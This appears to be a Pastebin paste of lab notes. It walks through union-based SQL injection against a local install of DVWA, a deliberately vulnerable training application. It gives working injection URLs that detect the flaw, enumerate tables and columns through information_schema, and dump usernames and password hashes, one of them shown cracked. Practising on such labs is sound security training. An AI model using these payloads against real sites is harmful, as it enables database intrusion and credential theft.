API tools faq
paste
Guest User

jai bajrang bali tod ne saurabh ki naak ki nali

a guest
Dec 23rd, 2016
133
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.07 KB | None | 0 0
raw download clone embed print report
  1. Download DVWA - Damn Vulnerable Web Application
  2.  
  3. (http://www.dvwa.co.uk/)
  4.  
  5. Put that downloaded file in
  6. C:\xampp\htdocs\ {as dvwa}
  7.  
  8. Now connect it to database, by opening the config/config.inc.php file
  9.  
  10. textbox = $id
  11.  
  12. Select id, fname, surname from table_name where id = 2 order by 1 --+ '
  13.  
  14. - I put 2 as id and we got some result out of it.
  15.  
  16. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#
  17.  
  18. -- In order to get an error so that we could check whether the site is vulnerable or not we will pass a quote as well
  19.  
  20. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2'&Submit=Submit#
  21.  
  22. So as we got an error, means the site is vulenrable.
  23.  
  24.  
  25. - you have to find out the no of paratmeter already in the query.
  26.  
  27. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' order by 1 --+ &Submit=Submit#
  28. that what we got as 2 parameters are there.
  29.  
  30. - now we have to inject our union with this query.
  31.  
  32. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select 5,6 --+ &Submit=Submit#
  33.  
  34. - now we can get the database name and version of my database
  35. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select database(), version() --+ &Submit=Submit#
  36.  
  37. so the databse name - dvwa
  38. and version of my databse is - 5.6.12
  39.  
  40. as we got the databse name, now we need to find out the table name:
  41.  
  42. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select 1,table_name from information_schema.tables --+ &Submit=Submit#
  43.  
  44. find the Juicy Table which could give you some passwords: users
  45.  
  46. so we find the sensitive table name, so need to proceed with column name
  47.  
  48. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select 1,column_name from information_schema.columns where table_name = 'users' --+ &Submit=Submit#
  49.  
  50. so we got user and password as the juicy columns in users table
  51.  
  52. Now we need to find the user and password from users table:
  53.  
  54. http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select user, password from users --+ &Submit=Submit#
  55.  
  56. so for id = 3
  57. first name : Hack
  58. Surname : Me
  59. username : 1337
  60. password : 8d3533d75ae2c3966d7e0d4fcc69216b ( charley )
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!